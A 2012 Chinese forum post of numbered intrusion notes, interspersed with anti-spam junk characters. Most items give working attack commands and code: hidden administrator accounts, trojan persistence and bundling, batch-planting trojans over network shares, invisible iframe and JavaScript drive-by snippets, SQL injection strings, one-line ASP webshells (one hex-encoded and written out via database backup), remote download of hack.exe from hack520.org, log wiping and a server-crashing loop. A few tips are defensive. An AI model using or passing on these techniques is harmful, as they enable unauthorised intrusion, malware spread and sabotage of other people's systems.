找回密码
 立即注册
查看: 2862|回复: 0
打印 上一主题 下一主题

入侵渗透笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:13:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,8 n6 D. }; r- t; t2 d- j9 s1 {
cacls C:\windows\system32 /G hqw20:R
7 j  q: c7 ~0 v: h6 z4 B思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
2 k3 f1 E$ h! J9 O6 j0 v* y. v恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F) W# s2 I% Q1 V
. E" j* J( v- W/ A; K, m# ^; N
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ Y1 ~7 T. e# R& `- s- i0 G
, Y8 u% Y( X4 X2 M; F/ e& _2 P2 a3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
3 h% ?7 {3 k  R% j/ x3 }; _; g
5 S8 \* A& {8 l: G# p' k5 g' k  I4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号! H: w9 \) e0 U# h  P
  v5 P1 p8 e: \
5、利用INF文件来修改注册表4 e% S- Z* C" a
[Version]- ?1 v' O. S! n8 G$ {# o
Signature="$CHICAGO$"
5 _$ X. }5 y. E. N% w1 o[Defaultinstall]. K4 r$ ]% P* d: x* J8 v& v
addREG=Ating
& Z& W" v" n) N5 S" p  ?[Ating]8 d3 z- V; o. e0 K4 `& i( B7 A! C
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
- |; A" v' D: g( x" M2 B以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:# {1 O5 J$ R8 Y1 w4 R9 d7 z
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径; Q* k+ |3 M7 J# O; x  {8 D
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU# H' y) }! E& c) x
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
5 q1 R4 \7 i8 b+ A8 cHKEY_CURRENT_CONFIG 简写为 HKCC
# ]9 A! R' C, \6 c  x* N0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值7 d$ l0 `3 U7 Z& b, R; s" |
"1"这里代表是写入或删除注册表键值中的具体数据2 a- P: C1 H& @" y. n% ?4 I  Z# Y
9 Z& P6 Z0 {! e0 [4 r. o) n
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,; ?) O' ~8 J4 R2 O1 g% Q* x0 y& c
多了一步就是在防火墙里添加个端口,然后导出其键值
& u1 ~$ b( a5 f' A/ @' l[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
' q0 B5 `8 S: j! P' I0 Z  x% Y5 d
3 E  \& f5 G( o7 Y5 e9 w7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
+ C. t. D; ^! P- C4 K4 G在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。  K  m4 A- Q! _2 P) J/ o: ?4 V

0 t9 V. X; J+ K5 I8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。8 `5 `/ c: c  D' j" n3 I# r. K/ c& R

& A2 e- [8 O  j  H7 f' N* }9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
4 s$ b9 L3 ~7 Q9 x# I7 i0 _0 G- _可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。! ?* K) W2 P1 a  S$ q
4 W4 Z! i) T8 Q" b3 a
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”) N1 q: ^* s, n6 }; c0 f1 o9 E* x

- X% ?( ~+ n5 i; [; d# k3 ~* U/ }5 f11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,; R* t9 c8 r* I' o- s/ S& v( z
用法:xsniff –pass –hide –log pass.txt5 _! M4 Y! C  A: e

- b' p& `1 f# W$ \$ W$ {7 V9 U8 K12、google搜索的艺术
, F& }6 n' j" o' P# V3 I4 c搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”4 U4 N; e( l& B& q3 ^8 Z' e& \
或“字符串的语法错误”可以找到很多sql注入漏洞。, E6 C) j/ W+ {/ ^
! o$ a0 b" K9 f' ?( k
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
4 D* O) H2 s. Q0 l: q" ]: D  }/ I/ @) K, Y$ W" l: }
14、cmd中输入 nc –vv –l –p 1987% m. `: G7 k. m: T4 T1 u) s
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃7 D' ~- Z, X- F' i2 T4 C
$ c8 E; S" H3 n7 `* j+ l' N- ]
15、制作T++木马,先写个ating.hta文件,内容为0 W8 Y8 p4 ^. \0 A8 X' ~5 O% V
<script language="VBScript">9 e0 H; v9 q! \* i) H  \3 ~) q- x
set wshshell=createobject ("wscript.shell" )
4 O% ^$ i. f; u* ka=wshshell.run("你马的名称",1)7 U9 t6 q: X) R4 s8 b
window.close$ |( c9 |# [7 ?+ v
</script>
+ u8 W$ T/ }1 x8 ]% y再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
( s) c2 O6 h+ d- _/ x
9 G$ w( g4 M5 X16、搜索栏里输入
2 @/ r) K. v& J0 ~  |关键字%'and 1=1 and '%'='
1 @* O$ Y  }, @3 d关键字%'and 1=2 and '%'='
, V- J2 _0 C- z比较不同处 可以作为注入的特征字符
5 p: r) e- V4 k$ q: d2 n
+ l' J6 z- f2 Z4 U$ E17、挂马代码<html>  H% k  B6 F$ j" ~6 y. \
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
1 C, D% K/ {* s" ]; f" e! q0 l. m</html>
3 S5 ^+ s9 o& u1 C9 [6 K, J  A' e7 B  d
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
5 ^7 C2 K4 r3 V; q0 f# U* tnet localgroup administrators还是可以看出Guest是管理员来。, Q7 M/ J& q$ s5 Q4 K+ M# c, \
& e0 {( @, w8 _9 U9 E# x# T
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
! `" `8 U1 E" K0 Q, U用法: 安装: instsrv.exe 服务名称 路径% ~- R# e1 Y+ M. \
卸载: instsrv.exe 服务名称 REMOVE- _* l5 j& v$ F* ?3 k3 w6 s9 w, A0 o
' J- ?1 u0 w. n: i

& d3 M, F  e6 p: z8 P21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
% B8 i0 G1 m/ O) M: E不能注入时要第一时间想到%5c暴库。
' ~. L4 O9 h' A0 T
9 G0 k/ p! x. H' A; ~22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~$ e# K7 b1 `. u5 T
0 n. q$ g& P  ^/ G9 z: j# E
23、缺少xp_cmdshell时
% t7 x6 Z! y' ?5 F: q7 ?尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
! f; i  ]! c8 }7 B# @假如恢复不成功,可以尝试直接加用户(针对开3389的)4 c- B8 P5 m# E! Y" R6 F, R
declare @o int
* n% i! C% l$ W0 O3 Hexec sp_oacreate 'wscript.shell',@o out
0 Q% @& a1 L' ?; {9 E. U/ Rexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员, W4 f+ ~6 d/ M
$ m7 H% ?8 |5 s" u; s) c" q, r
24.批量种植木马.bat
' B4 a5 y( [  o0 g! L: h) L: I0 ~/ yfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中) D! _% m* l2 i' M# \4 ?. _! ~
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
1 O2 v" |# k$ Y; `7 v扫描地址.txt里每个主机名一行 用\\开头9 C. Z9 A! k$ i$ N2 ^' h' r( _3 r

; ^: X: v: G9 d" c4 t$ O7 p. Z# c1 d25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。8 H7 x3 C1 |/ ]" A

. }1 O6 w) O* F( y: n1 m5 K0 b26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 Q+ t/ F/ c) I4 D& Y, w7 b7 q将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
% H; G6 ?0 v1 W.cer 等后缀的文件夹下都可以运行任何后缀的asp木马/ f3 O7 I( D& n& o8 }* Q

2 v, C9 A4 I2 b5 b2 W27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP  [/ h$ S. _$ t. Z
然后用#clear logg和#clear line vty *删除日志
% q7 i- \$ p) X: \7 L: v" k0 Z; p; c1 n1 ^( O4 w+ d+ w
28、电脑坏了省去重新安装系统的方法
5 z, t! @# B- t# l$ Q1 v8 W6 ?6 {  d纯dos下执行,
* Z! Z  t/ s6 p) N* x2 N8 s. @1 Y  Pxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
+ }: E$ \8 L0 f% _0 \5 R' X2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config& o3 Z. e# b$ p* Q1 g
. \  M6 ~" x- Q
29、解决TCP/IP筛选 在注册表里有三处,分别是:) ]5 q! N* ^7 [) U  g/ }
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip% e! H4 h$ w& O2 k
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 O$ s" S& v$ t7 [0 |- `' n
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, M! [6 f7 Q: K1 V$ h+ L- Y分别用
$ M7 C4 h! q$ O- m/ jregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 k7 n1 ~% ^! vregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
. X- a7 H- @. ^5 Kregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 G! V4 M% t) }1 J2 c3 ?# I; u命令来导出注册表项
3 l- g1 |# O/ A( N. r. k( S+ |! _然后把三个文件里的EnableSecurityFilters"=dword:00000001,  x9 f. h; {  _% h5 d  t
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
7 [6 G1 f9 S. a. |5 z9 Gregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。, s" @$ c! r6 L* N

. Z/ a: \8 P. b$ L& u& B2 r, u30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
7 \  R. h7 ^. A8 w$ HSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3+ Z% y, e& Q& M7 J

3 o7 L8 E7 z4 l" e$ S, U31、全手工打造开3389工具
( u0 _& q: D: K  H打开记事本,编辑内容如下:& G; T8 B. b* Y0 X  k
echo [Components] > c:\sql, g7 a0 U: m+ @: v' b' V) Z
echo TSEnable = on >> c:\sql
5 D" h7 _5 v4 S- B+ Psysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% \+ ~" B, T- N; h  z/ y( i7 @  \编辑好后存为BAT文件,上传至肉鸡,执行
) p: u* t' K  G4 \4 ?% o& {% ]0 Z( _7 ^  R& u+ }+ b
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
3 J+ n# t9 v8 L; r5 }" M- g5 B
( h2 \! s" h" L( S5 R33、让服务器重启- Y$ W. ~0 O  t5 F# i3 Z
写个bat死循环:% }- t& M, X% L. m1 I! m# Q6 c
@echo off! a" Q9 x. [3 a* N# R
:loop1
( A1 g' k( b" Y, n3 A. I+ ucls; y4 _$ m1 w* Z7 N
start cmd.exe' T1 [3 g5 C: |3 S: l2 l$ l. i% t4 s
goto loop1
" u, a1 u( |1 `+ Q5 r) E0 H保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启# {3 k- l& T0 D. w0 D' c

5 j0 x8 ~( S* s/ C* R: k34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
( w" _- w) h, N" A% q8 {7 b! J* l@echo off( q: A0 H. K: G( h6 P) L; d% S+ m3 a
date /t >c:/3389.txt1 H* S6 h1 ]2 b( B) }/ Z
time /t >>c:/3389.txt: G1 d0 w+ _0 G
attrib +s +h c:/3389.bat
: k  X4 t9 E2 S& i' L' F, J/ Qattrib +s +h c:/3389.txt6 y% t8 ]$ Q* p0 I/ q1 |' N3 p
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
# a; h  e, P. Y  Y/ [/ `$ v并保存为3389.bat
1 w9 m# ?3 v7 b7 k4 C0 H2 H打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- K) o# l+ s1 V) k* q
2 F2 D; l4 E9 d, g' W; M35、有时候提不了权限的话,试试这个命令,在命令行里输入:
- t6 |# v3 \" Bstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)# D' K5 w% \2 J0 W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- d0 v- g7 D* k) n4 P
% A- C5 j6 r# W  J, P; S! ~
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
5 \$ F: V, Z1 [3 `3 g9 `echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址9 n+ ]5 U% f' M! Q- q; Q& i
echo 你的FTP账号 >>c:\1.bat //输入账号/ j1 k5 y# L% {! Y
echo 你的FTP密码 >>c:\1.bat //输入密码
$ {1 f5 ]9 j: o7 E0 }% W* Zecho bin >>c:\1.bat //登入
% M: G  j! G# l8 O- a- ?echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么" ~$ Y9 ], A3 G: X
echo bye >>c:\1.bat //退出2 Q" ?5 a" K5 q6 T) _6 v
然后执行ftp -s:c:\1.bat即可/ G) V7 |+ E* M1 y( ~

' p- o( R6 V1 Z  g2 v* G; }: c37、修改注册表开3389两法
9 Y0 D, [9 ]8 w0 m  M" n" \; x1 H(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
+ l/ S4 U% Q, S( q. necho Windows Registry Editor Version 5.00 >>3389.reg0 M8 n2 v! m+ R" B1 k/ j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg2 Y/ D9 A& R& o. e4 C/ B
echo "Enabled"="0" >>3389.reg
% a, y! O' ]0 [; z( k. e; gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
. `7 l9 B6 R" R: b7 s% LNT\CurrentVersion\Winlogon] >>3389.reg
  O( o$ p- S  j2 ^4 y0 o# necho "ShutdownWithoutLogon"="0" >>3389.reg! K, _3 q+ l; o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]8 _+ H* O% r, W1 @. u2 U$ s
>>3389.reg' f: q* B8 ]/ r& x+ o+ A" B
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg2 H6 \  ]1 V* U9 x3 d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]/ I, r6 r5 j3 K" i0 |9 i7 ?
>>3389.reg
, t" B& P& b5 q7 b1 I* p5 t* Iecho "TSEnabled"=dword:00000001 >>3389.reg
4 @( f6 I$ E$ \5 O# h& `8 X  Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
5 S4 A) p* z# J, L4 xecho "Start"=dword:00000002 >>3389.reg% h: H1 {! R9 e+ R1 w  a, `7 _9 A" G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
# r5 P% j/ V1 m$ S  @, {. K>>3389.reg" n$ _" r* N) e4 r# V
echo "Start"=dword:00000002 >>3389.reg
9 ~. N' D0 I$ M; S3 Gecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg: {0 A$ H/ G+ e+ m6 v
echo "Hotkey"="1" >>3389.reg
) e' h4 P4 d( O) U4 @2 g5 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ D7 N: I8 {; |! H
Server\Wds\rdpwd\Tds\tcp] >>3389.reg; k  O6 A# T9 ?4 n
echo "PortNumber"=dword:00000D3D >>3389.reg
+ A# J& P8 P6 ~- w" q' P5 j0 xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 C% V9 F. \- a7 e
Server\WinStations\RDP-Tcp] >>3389.reg4 g" d1 D' M# m2 D
echo "PortNumber"=dword:00000D3D >>3389.reg
# g+ F, o5 \- T$ M  p' c把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。8 c1 H' e. x- n2 S: N! k
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了), z9 f, p/ l4 o; O& a
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
" h  m, M8 K  L' ]+ K(2)winxp和win2003终端开启5 O) t9 b1 w% d1 `6 x- \8 ~8 p
用以下ECHO代码写一个REG文件:9 R" D9 L: \4 o# ]/ v# m3 C
echo Windows Registry Editor Version 5.00>>3389.reg
, M& U7 q+ l* M, aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 r; V# X" j' L9 n- X8 u
Server]>>3389.reg
- K' g! _) o& o) n2 becho "fDenyTSConnections"=dword:00000000>>3389.reg
" a- e7 |, \! W5 {4 f1 Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# m: a+ q9 w" JServer\Wds\rdpwd\Tds\tcp]>>3389.reg9 y0 g8 t+ m6 q# @9 y5 f% [! }2 }& x
echo "PortNumber"=dword:00000d3d>>3389.reg; ^( m6 B' e; p: d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. U/ b% N3 }8 C- g2 N+ `/ c
Server\WinStations\RDP-Tcp]>>3389.reg7 s, h4 `, i- W3 z4 L3 o5 [! Z
echo "PortNumber"=dword:00000d3d>>3389.reg( @) ?/ G+ g- h# D
然后regedit /s 3389.reg del 3389.reg
5 O0 O8 s2 U' R. i2 P5 _! M. k) bXP下不论开终端还是改终端端口都不需重启9 R% X. C2 b9 D+ b0 J
; L# z- T& m. n0 ~1 Z" {7 J, v4 C
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) ~* M* ^6 C6 p+ v3 y用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
5 ~7 u8 Q5 z1 A$ C
7 W6 l, {; S8 b  o- ?9 j5 ?+ K: |39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
% P+ b% W; y9 M% Z: \. b) }$ d(1)数据库文件名应复杂并要有特殊字符+ p  s( ^# _0 T* m' P' p) b
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源; C, I: X0 h; g- {5 e* r
将conn.asp文档中的' i+ f4 }# C% [7 Z  s4 H
DBPath = Server.MapPath("数据库.mdb")
8 \0 M  W6 K, I7 d- C4 a: j; pconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 J0 v7 O$ K; C- E( y4 ?! g. K. T4 r
" U* |/ V8 x3 x# o
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置, H9 F2 D- L% a
(3)不放在WEB目录里
* W* d$ }) t, r. t. G1 N. B3 X$ o: C1 [
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
/ S% r: q8 Q" d! @6 L可以写两个bat文件
+ ^8 k5 k% Y6 I. M@echo off
+ C5 G" d  j  c9 S8 P, v- G, D- x@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe! e: V: f$ q& Y+ e
@del c:\winnt\system32\query.exe
4 [7 k' w" j7 b; C@del %SYSTEMROOT%\system32\dllcache\query.exe$ |1 O4 E* ~* a5 h8 o4 }1 [
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的! F/ y/ A3 s( S$ w
1 g+ q! j8 k& S: V
@echo off
* h9 u: A+ J- W+ ~1 k6 j@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe8 j( S+ n3 A4 i: h5 _! y" K5 w. a$ u
@del c:\winnt\system32\tsadmin.exe* E& k. V: r0 v! R$ u7 E- y) `
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex! K2 T' x  Y  I, p# x& z
0 J) N; a- }3 H1 J
41、映射对方盘符
1 a5 a' |2 o; f2 m8 H+ R+ W; _telnet到他的机器上,0 v; s, K! L+ A& z- T  `; w
net share 查看有没有默认共享 如果没有,那么就接着运行
  p( a5 K8 c& T8 Qnet share c$=c:
$ s: e3 J. K& E+ b- Dnet share现在有c$% `3 G( ?: |- d# `3 D$ O% C* {
在自己的机器上运行6 H0 V0 u5 @& h, s, y' N9 ~
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
- Y7 ]  z. a$ U% C+ o- e7 H2 C9 q; e6 ?9 c" w2 }
42、一些很有用的老知识
" t6 K0 M& E9 ^% F. ztype c:\boot.ini ( 查看系统版本 )
: S( b# `7 u2 C! Inet start (查看已经启动的服务)+ m# n* Q% |0 z1 ?' |) S2 [; v% o
query user ( 查看当前终端连接 )
% ]; I, @, r, `* ~' n. L* V& U3 u( }net user ( 查看当前用户 )$ V7 K) p; D6 Z  C
net user 用户 密码/add ( 建立账号 )
6 s/ `. i( f1 ^6 r7 @net localgroup administrators 用户 /add (提升某用户为管理员)
# D# o& ?/ b+ G0 ?3 n) ?! Lipconfig -all ( 查看IP什么的 )& G: X+ [1 d, _7 T: k# q
netstat -an ( 查看当前网络状态 )
) @0 u( |# Z8 d" S1 W8 n# M) O7 afindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
+ v* E5 d8 E# i$ X克隆时Administrator对应1F4
/ l+ f" q9 g0 }* X! S1 ?guest对应1F5  A! w  P6 z7 D6 v
tsinternetuser对应3E8
0 B7 W- b. ]& u/ b7 L
5 _( X- n+ Y4 z, k$ S7 J43、如果对方没开3389,但是装了Remote Administrator Service2 G( E6 R& I# x. `) z
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
5 t1 ]! [/ |  i解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
; T" u, n( j8 ]4 u  i先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
" q4 n+ p7 T: K: i- K# M, h) \# M1 d/ J* o4 c1 c2 W7 O
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)+ X5 ^8 k( y$ N6 W2 r; _
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)9 M( g; s4 D% D: u6 a/ U/ r0 h  P' h
/ p! @- O' D. u% f* h/ v3 l% c
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)- z& i) f+ e6 n6 r: J
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
! K9 |2 R: s2 m6 o: g! T^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
' {# f8 d" @: s$ O- S" Y! SCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =1 [3 F$ ]2 D# j% L# u  Z
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs2 ~4 ^# D* ]  e$ a8 x$ J  w
(这是完整的一句话,其中没有换行符)0 K3 [* f6 B$ w$ T3 j: a, B3 K8 {6 c. }
然后下载:  z" V5 f2 v9 ~" `7 s
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
* W# l, r) ]$ b- L5 a% C
* J8 u- i( q% d0 ?8 L) k46、一句话木马成功依赖于两个条件:
2 p) s+ M0 T  a' f; H% c1、服务端没有禁止adodb.Stream或FSO组件
$ [- H, z0 `. q" |5 v* k1 I2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。( ^0 ~' M& q9 T5 M
% r7 w: R0 T: B4 {/ _: v& [
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
1 Z4 k+ p; X% l) S5 T5 R; s4 ?  X% X;alter database utsz set RECOVERY FULL--
) i! M; k  Y7 ^$ y. G  ]. J( a* k;create table cmd (a image)--
4 W9 {. B6 J# q  D- c, j" Z$ O;backup log utsz to disk = 'D:\cmd' with init--" Y: |: a8 \2 x7 W7 R3 J( l1 M4 E6 R
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
- U# W  ^- d" k, _3 }! B;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
) f' o: }1 ^4 o1 H8 ]  v+ _3 G" T3 [2 F注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。& ~* `. n" b! H5 L$ X* C- Q3 f! M
* D, K0 F( n0 n' Q! @. g- q9 f* ]
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
: ]2 m6 Z% C8 X3 {, _
) C4 j' Z0 m4 ]" P# R8 I用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options; R# V9 B3 P( L# k
所有会话用 'all'。: u6 P! L: a. }5 y- k+ B$ k' ]6 ^( S
-s sessionid 列出会话的信息。/ D* O* t) V! d3 L' v9 I' j6 _
-k sessionid 终止会话。9 J- [8 }; F0 p3 G, [+ I
-m sessionid 发送消息到会话。
/ h( b7 @9 }# P& u/ f
, e/ q' X4 U/ i) wconfig 配置 telnet 服务器参数。
- b/ S+ A3 }, k% f/ {" f* ]
  @) K& f- r  z7 m8 S5 K. Ecommon_options 为:) v$ F% Z$ n% @2 I9 {
-u user 指定要使用其凭据的用户$ Z! r4 r, ~3 M, B2 Y6 C
-p password 用户密码
# c# y6 l. H/ J3 U1 L9 V/ F( ~  `- p' c7 U" K( @: V7 u3 g
config_options 为:4 `# s' I% t; D$ \# q+ s% g
dom = domain 设定用户的默认域
- t! g; C2 I  J/ X) h; q: ~2 rctrlakeymap = yes|no 设定 ALT 键的映射. t- ~4 r- d- |( U# [
timeout = hh:mm:ss 设定空闲会话超时值" M1 C+ k! |/ l6 ^$ T4 P
timeoutactive = yes|no 启用空闲会话。/ T% H7 g; d' f
maxfail = attempts 设定断开前失败的登录企图数。
5 J+ }- U! d  D0 l5 X2 Xmaxconn = connections 设定最大连接数。0 e* B: T5 |5 P  J
port = number 设定 telnet 端口。: t# Q/ s5 F/ R( D8 V" M& K
sec = [+/-]NTLM [+/-]passwd
7 f0 v- X& S; ]; b, n( G设定身份验证机构
* U0 x- G" {& ?fname = file 指定审计文件名。
1 N" Q" d! c" T3 d9 c. i2 Wfsize = size 指定审计文件的最大尺寸(MB)。
% Q( }1 n1 C. ~" i1 B& I3 ~. i0 Ymode = console|stream 指定操作模式。
& ~$ c. Q; `$ o2 [; F# bauditlocation = eventlog|file|both
/ U( v, I5 ], g" G) o指定记录地点
) ~0 o  u; A  i# J3 raudit = [+/-]user [+/-]fail [+/-]admin- b( \" E; z8 x; P: e, G5 R

& B- N! m5 h3 m3 U+ k% `9 W49、例如:在IE上访问:
* [5 {2 k2 x# I& Q9 d+ _" Q. Pwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
- S. q6 Q/ G1 u* d$ T: ^hack.txt里面的代码是:
5 X: S6 S2 r5 F6 G<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
/ w  b2 z. Z( Q& P: }把这个hack.txt发到你空间就可以了!
8 u- _2 A0 F% y. V这个可以利用来做网马哦!
" k; v7 @+ v; _! |- ^
0 s( ^  T$ M/ b/ g7 C, c  P50、autorun的病毒可以通过手动限制!& G1 f1 s( ^. G7 a
